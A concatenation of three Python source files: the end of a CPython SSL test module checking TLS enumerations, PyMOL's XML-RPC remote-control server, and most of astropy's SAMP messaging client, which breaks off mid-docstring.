def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
rpc.py
|
""" an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate$
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev$
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd,cgo
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
""" Used to establish whether or not the server is alive.
This is a good thing to call after establishing a connection just to
make sure that everything is ok.
Returns 1
"""
return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
""" create a text label
Arguments:
pos: a 3 tuple with the position of the label
text: a string with the label
color: a 3 tuple with the color of the label. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
NOTE:
at the moment this is, how you say, a hack
"""
cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
cmd.set_color("%s-color"%id,color)
cmd.color("%s-color"%id,id)
return 1
def rpcResetCGO(id):
""" removes a CGO from the local dictionary
"""
global cgoDict
if id=="*":
cgoDict={}
res = 1
elif id in cgoDict:
del(cgoDict[id])
res = 1
else:
res = 0
return res
def rpcSphere(pos,rad,color,id='cgo',extend=1,
transparent=0,transparency=0.5):
""" create a sphere
Arguments:
pos: a 3 tuple with the position of the sphere
rad: a float with the radius
color: a 3 tuple with the color of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
"""
r,g,b = color
x,y,z = pos
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
""" renders a CGO vector
Arguments:
cgoV: a vector of floats
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
obj.extend(cgoV)
cmd.load_cgo(obj,id,1)
return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
""" create a sphere
Arguments:
sphereD: a series of (pos,rad,color,transparent,transparency) tuples
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
for pos,rad,color,transparent,transparency in sphereD:
r,g,b = color
x,y,z = pos
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
transparent=0,transparency=0.5):
""" create a cylinder
Arguments:
end1: a 3 tuple with the position of end1 of the sphere
end2: a 3 tuple with the position of end1 of the sphere
rad: a float with the radius
color1: a 3 tuple with the color of end1 of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
color2: (OPTIONAL) a 3 tuple with the color of end2 of the sphere. (1,1,1)
is white
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
NOTE: the reason that color2 follows id is that I think clients are
going to be interested in setting the id more often than they are going
to care about the second color.
"""
global cgoDict
if color2 is None: color2 = color1
r1,g1,b1 = color1
r2,g2,b2 = color2
x1,y1,z1 = end1
x2,y2,z2 = end2
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcDeleteObject(objName):
""" deletes an object """
try:
cmd.delete(objName)
except:
res = 0
else:
res = 1
return res
def rpcDeleteAll():
""" deletes all objects """
res = cmd.delete('all')
if res is not None:
return res
else:
return ''
def colorObj(objName,colorScheme):
""" sets an molecule's color scheme
Arguments:
- objName: the object (molecule) to change
- colorScheme: name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
"""
if colorScheme:
if colorScheme == 'std':
# this is an adaptation of the cbag scheme from util.py, but
# with a gray carbon.
cmd.color("magenta","("+objName+")",quiet=1)
cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
cmd.color("gray","(elem C and "+objName+")",quiet=1)
elif hasattr(utils,colorScheme):
fn = getattr(utils,colorScheme)
fn(objName,quiet=1)
res = 1
else:
res = 0
return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
""" loads a molecule from a pdb string
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_pdbstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
""" loads a molecule from a mol block
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_molstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
""" loads an object from a file
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
colorScheme: (OPTIONAL) name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
if not objName:
objName = fileName.split('.')[0]
if replace:
cmd.delete(objName)
res = cmd.load(fileName,objName,format=format)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadSurface(fileName,objName,format='',surfaceLevel=1.0):
""" loads surface data from a file and adds an isosurface
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
if not objName:
objName = fileName.split('.')[0]
gridName = 'grid-%s'%objName
res = cmd.load(fileName,gridName,format='')
cmd.isosurface(objName,gridName,level=surfaceLevel)
if res is not None:
return res
else:
return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
""" loads surface data from a string and adds an isosurface
Arguments:
data: the data to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
gridName = 'grid-%s'%objName
# it would be nice if we didn't have to go by way of the temporary file,
# but at the moment pymol will only read shapes from files
tempnm = tempfile.mktemp('.grd')
open(tempnm,'w+').write(data)
res = rpcLoadSurface(tempnm,objName,format='',surfaceLevel=surfaceLevel)
os.unlink(tempnm)
if res is not None:
return res
else:
return ''
def rpcRotate(vect,objName='',state=-1):
""" rotates objects
Arguments:
- vect: a sequence with x y and z rotations
- objName: (OPTIONAL) object to be rotated
- state: (OPTIONAL) if zero only visible states are rotated,
if -1 (the default), all states are rotated
"""
cmd.rotate('x',vect[0],objName,state=state)
cmd.rotate('y',vect[1],objName,state=state)
cmd.rotate('z',vect[2],objName,state=state)
return 1
def rpcGetNames(what='selections',enabledOnly=1):
""" returns the results of cmd.get_names(what) """
return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
""" returns the results of cmd.id_atom(what) """
return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
""" returns the results of cmd.get_atom_coords(what,state) """
return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
""" returns general help text or help on a particular command """
global serv
res = 'Command Not Found'
if not what:
res = list(serv.funcs.keys())
else:
funcs = serv.funcs
if what in funcs:
fn = funcs[what]
res = "Function: %s("%what
defs = fn.__defaults__
if defs:
code = fn.__code__
nDefs = len(defs)
args = []
i = -1
for i in range(code.co_argcount - nDefs):
args.append(code.co_varnames[i])
for j in range(nDefs):
vName = code.co_varnames[j+i+1]
args.append("%s=%s"%(vName,repr(defs[j])))
res += ','.join(args)
res += ')\n'
if fn.__doc__:
res += fn.__doc__
return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
""" launches the xmlrpc server into a separate thread
Arguments:
hostname: (OPTIONAL) name of the host for the server
(defaults to be the name of the localhost)
port: (OPTIONAL) the first port to try for the server
nToTry: (OPTIONAL) the number of possible ports to try
(in case the first can't be opened)
"""
if not hostname:
import os
hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
global cgoDict,serv
cgoDict = {}
for i in range(nToTry):
try:
serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
allow_none=True)
except:
serv = None
else:
break
if serv:
print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
# import PyMOL API
from pymol import api
serv.register_instance(cmd)
# legacy stuff with unique names
serv.register_function(rpcPing,'ping')
serv.register_function(rpcResetCGO,'resetCGO')
serv.register_function(rpcRenderCGO,'renderCGO')
serv.register_function(rpcSphere,'sphere')
serv.register_function(rpcSpheres,'spheres')
serv.register_function(rpcCylinder,'cylinder')
serv.register_function(rpcDeleteObject,'deleteObject')
serv.register_function(rpcDeleteAll,'deleteAll')
serv.register_function(rpcLoadPDB,'loadPDB')
serv.register_function(rpcLoadMolBlock,'loadMolBlock')
serv.register_function(rpcLoadSurface,'loadSurface')
serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
serv.register_function(rpcLoadFile,'loadFile')
serv.register_function(rpcGetNames,'getNames')
serv.register_function(api.count_atoms,'countAtoms')
serv.register_function(rpcIdAtom,'idAtom')
serv.register_function(rpcHelp,'help')
serv.register_function(rpcGetAtomCoords,'getAtomCoords')
# legacy stuff, should be removed because overwrites API names!
serv.register_function(rpcLabel,'label') # pseudoatom
serv.register_function(rpcRotate,'rotate')
serv.register_introspection_functions()
t = threading.Thread(target=serv.serve_forever)
t.setDaemon(1)
t.start()
else:
print('xml-rpc server could not be started')
# vi:expandtab:smarttab:sw=2
|
client.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import os
import select
import socket
import threading
import warnings
from urllib.parse import urlunparse
from .constants import SAMP_STATUS_OK, SAMP_STATUS_WARNING
from .hub import SAMPHubServer
from .errors import SAMPClientError, SAMPWarning
from .utils import internet_on, get_num_args
from .standard_profile import ThreadingXMLRPCServer
__all__ = ['SAMPClient']
class SAMPClient:
"""
Utility class which provides facilities to create and manage a SAMP
compliant XML-RPC server that acts as SAMP callable client application.
Parameters
----------
hub : :class:`~astropy.samp.SAMPHubProxy`
An instance of :class:`~astropy.samp.SAMPHubProxy` to be
used for messaging with the SAMP Hub.
name : str, optional
Client name (corresponding to ``samp.name`` metadata keyword).
description : str, optional
Client description (corresponding to ``samp.description.text`` metadata
keyword).
metadata : dict, optional
Client application metadata in the standard SAMP format.
addr : str, optional
Listening address (or IP). This defaults to 127.0.0.1 if the internet
is not reachable, otherwise it defaults to the host name.
port : int, optional
Listening XML-RPC server socket port. If left set to 0 (the default),
the operating system will select a free port.
callable : bool, optional
Whether the client can receive calls and notifications. If set to
`False`, then the client can send notifications and calls, but can not
receive any.
"""
# TODO: define what is meant by callable
def __init__(self, hub, name=None, description=None, metadata=None,
addr=None, port=0, callable=True):
# GENERAL
self._is_running = False
self._is_registered = False
if metadata is None:
metadata = {}
if name is not None:
metadata["samp.name"] = name
if description is not None:
metadata["samp.description.text"] = description
self._metadata = metadata
self._addr = addr
self._port = port
self._xmlrpcAddr = None
self._callable = callable
# HUB INTERACTION
self.client = None
self._public_id = None
self._private_key = None
self._hub_id = None
self._notification_bindings = {}
self._call_bindings = {"samp.app.ping": [self._ping, {}],
"client.env.get": [self._client_env_get, {}]}
self._response_bindings = {}
self._host_name = "127.0.0.1"
if internet_on():
try:
self._host_name = socket.getfqdn()
socket.getaddrinfo(self._addr or self._host_name, self._port or 0)
except socket.error:
self._host_name = "127.0.0.1"
self.hub = hub
if self._callable:
self._thread = threading.Thread(target=self._serve_forever)
self._thread.daemon = True
self.client = ThreadingXMLRPCServer((self._addr or self._host_name,
self._port), logRequests=False, allow_none=True)
self.client.register_introspection_functions()
self.client.register_function(self.receive_notification, 'samp.client.receiveNotification')
self.client.register_function(self.receive_call, 'samp.client.receiveCall')
self.client.register_function(self.receive_response, 'samp.client.receiveResponse')
# If the port was set to zero, then the operating system has
# selected a free port. We now check what this port number is.
if self._port == 0:
self._port = self.client.socket.getsockname()[1]
protocol = 'http'
self._xmlrpcAddr = urlunparse((protocol,
'{0}:{1}'.format(self._addr or self._host_name,
self._port),
'', '', '', ''))
def start(self):
"""
Start the client in a separate thread (non-blocking).
This only has an effect if ``callable`` was set to `True` when
initializing the client.
"""
if self._callable:
self._is_running = True
self._run_client()
def stop(self, timeout=10.):
"""
Stop the client.
Parameters
----------
timeout : float
Timeout after which to give up if the client cannot be cleanly
shut down.
"""
# Setting _is_running to False causes the loop in _serve_forever to
# exit. The thread should then stop running. We wait for the thread to
# terminate until the timeout, then we continue anyway.
self._is_running = False
if self._callable and self._thread.is_alive():
self._thread.join(timeout)
if self._thread.is_alive():
raise SAMPClientError("Client was not shut down successfully "
"(timeout={0}s)".format(timeout))
@property
def is_running(self):
"""
Whether the client is currently running.
"""
return self._is_running
@property
def is_registered(self):
"""
Whether the client is currently registered.
"""
return self._is_registered
def _run_client(self):
if self._callable:
self._thread.start()
def _serve_forever(self):
while self._is_running:
try:
read_ready = select.select([self.client.socket], [], [], 0.1)[0]
except OSError as exc:
warnings.warn("Call to select in SAMPClient failed: {0}".format(exc),
SAMPWarning)
else:
if read_ready:
self.client.handle_request()
self.client.server_close()
def _ping(self, private_key, sender_id, msg_id, msg_mtype, msg_params,
message):
reply = {"samp.status": SAMP_STATUS_OK, "samp.result": {}}
self.hub.reply(private_key, msg_id, reply)
def _client_env_get(self, private_key, sender_id, msg_id, msg_mtype,
msg_params, message):
if msg_params["name"] in os.environ:
reply = {"samp.status": SAMP_STATUS_OK,
"samp.result": {"value": os.environ[msg_params["name"]]}}
else:
reply = {"samp.status": SAMP_STATUS_WARNING,
"samp.result": {"value": ""},
"samp.error": {"samp.errortxt":
"Environment variable not defined."}}
self.hub.reply(private_key, msg_id, reply)
def _handle_notification(self, private_key, sender_id, message):
if private_key == self.get_private_key() and "samp.mtype" in message:
msg_mtype = message["samp.mtype"]
del message["samp.mtype"]
msg_params = message["samp.params"]
del message["samp.params"]
msubs = SAMPHubServer.get_mtype_subtypes(msg_mtype)
for mtype in msubs:
if mtype in self._notification_bindings:
bound_func = self._notification_bindings[mtype][0]
if get_num_args(bound_func) == 5:
bound_func(private_key, sender_id, msg_mtype,
msg_params, message)
else:
bound_func(private_key, sender_id, None, msg_mtype,
msg_params, message)
return ""
def receive_notification(self, private_key, sender_id, message):
"""
Standard callable client ``receive_notification`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_notification`
method is used to bind distinct operations to MTypes. In case of a
customized callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
sender_id : str
Sender public ID.
message : dict
Received message.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_notification(private_key, sender_id, message)
def _handle_call(self, private_key, sender_id, msg_id, message):
if private_key == self.get_private_key() and "samp.mtype" in message:
msg_mtype = message["samp.mtype"]
del message["samp.mtype"]
msg_params = message["samp.params"]
del message["samp.params"]
msubs = SAMPHubServer.get_mtype_subtypes(msg_mtype)
for mtype in msubs:
if mtype in self._call_bindings:
self._call_bindings[mtype][0](private_key, sender_id,
msg_id, msg_mtype,
msg_params, message)
return ""
def receive_call(self, private_key, sender_id, msg_id, message):
"""
Standard callable client ``receive_call`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_call` method is
used to bind distinct operations to MTypes. In case of a customized
callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
sender_id : str
Sender public ID.
msg_id : str
Message ID received.
message : dict
Received message.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_call(private_key, sender_id, msg_id, message)
def _handle_response(self, private_key, responder_id, msg_tag, response):
if (private_key == self.get_private_key() and
msg_tag in self._response_bindings):
self._response_bindings[msg_tag](private_key, responder_id,
msg_tag, response)
return ""
def receive_response(self, private_key, responder_id, msg_tag, response):
"""
Standard callable client ``receive_response`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_response` method
is used to bind distinct operations to MTypes. In case of a customized
callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
responder_id : str
Responder public ID.
msg_tag : str
Response message tag.
response : dict
Received response.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_response(private_key, responder_id, msg_tag,
response)
def bind_receive_message(self, mtype, function, declare=True,
metadata=None):
"""
Bind a specific MType to a function or class method, being intended for
a call or a notification.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, msg_id,
mtype, params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``msg_id`` is the Hub message-id (calls only,
otherwise is `None`), ``mtype`` is the message MType, ``params`` is the
message parameter set (content of ``"samp.params"``) and ``extra`` is a
dictionary containing any extra message map entry. The client is
automatically declared subscribed to the MType by default.
Parameters
----------
mtype : str
MType to be catched.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
self.bind_receive_call(mtype, function, declare=declare,
metadata=metadata)
self.bind_receive_notification(mtype, function, declare=declare,
metadata=metadata)
def bind_receive_notification(self, mtype, function, declare=True, metadata=None):
"""
Bind a specific MType notification to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, mtype,
params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``mtype`` is the message MType, ``params`` is
the notified message parameter set (content of ``"samp.params"``) and
``extra`` is a dictionary containing any extra message map entry. The
client is automatically declared subscribed to the MType by default.
Parameters
----------
mtype : str
MType to be caught.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
if not metadata:
metadata = {}
self._notification_bindings[mtype] = [function, metadata]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def bind_receive_call(self, mtype, function, declare=True, metadata=None):
"""
Bind a specific MType call to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, msg_id,
mtype, params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``msg_id`` is the Hub message-id, ``mtype`` is
the message MType, ``params`` is the message parameter set (content of
``"samp.params"``) and ``extra`` is a dictionary containing any extra
message map entry. The client is automatically declared subscribed to
the MType by default.
Parameters
----------
mtype : str
MType to be caught.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
if not metadata:
metadata = {}
self._call_bindings[mtype] = [function, metadata]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def bind_receive_response(self, msg_tag, function):
"""
Bind a specific msg-tag response to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, responder_id,
msg_tag, response)
where ``private_key`` is the client private-key, ``responder_id`` is
the message responder ID, ``msg_tag`` is the message-tag provided at
call time and ``response`` is the response received.
Parameters
----------
msg_tag : str
Message-tag to be caught.
function : callable
Application function to be used when ``msg_tag`` is received.
"""
if self._callable:
self._response_bindings[msg_tag] = function
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_notification(self, mtype, declare=True):
"""
Remove from the notifications binding table the specified MType and
unsubscribe the client from it (if required).
Parameters
----------
mtype : str
MType to be removed.
declare : bool
Specify whether the client must be automatically declared as
unsubscribed from the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
del self._notification_bindings[mtype]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_call(self, mtype, declare=True):
"""
Remove from the calls binding table the specified MType and unsubscribe
the client from it (if required).
Parameters
----------
mtype : str
MType to be removed.
declare : bool
Specify whether the client must be automatically declared as
unsubscribed from the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
del self._call_bindings[mtype]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_response(self, msg_tag):
"""
Remove from the responses binding table the specified message-tag.
Parameters
----------
msg_tag : str
Message-tag to be removed.
"""
if self._callable:
del self._response_bindings[msg_tag]
else:
raise SAMPClientError("Client not callable.")
def declare_subscriptions(self, subscriptions=None):
"""
Declares the MTypes the client wishes to subscribe to, implicitly
defined with the MType binding methods
:meth:`~astropy.samp.client.SAMPClient.bind_receive_notification`
and :meth:`~astropy.samp.client.SAMPClient.bind_receive_call`.
An optional ``subscriptions`` map can be added to the final map passed
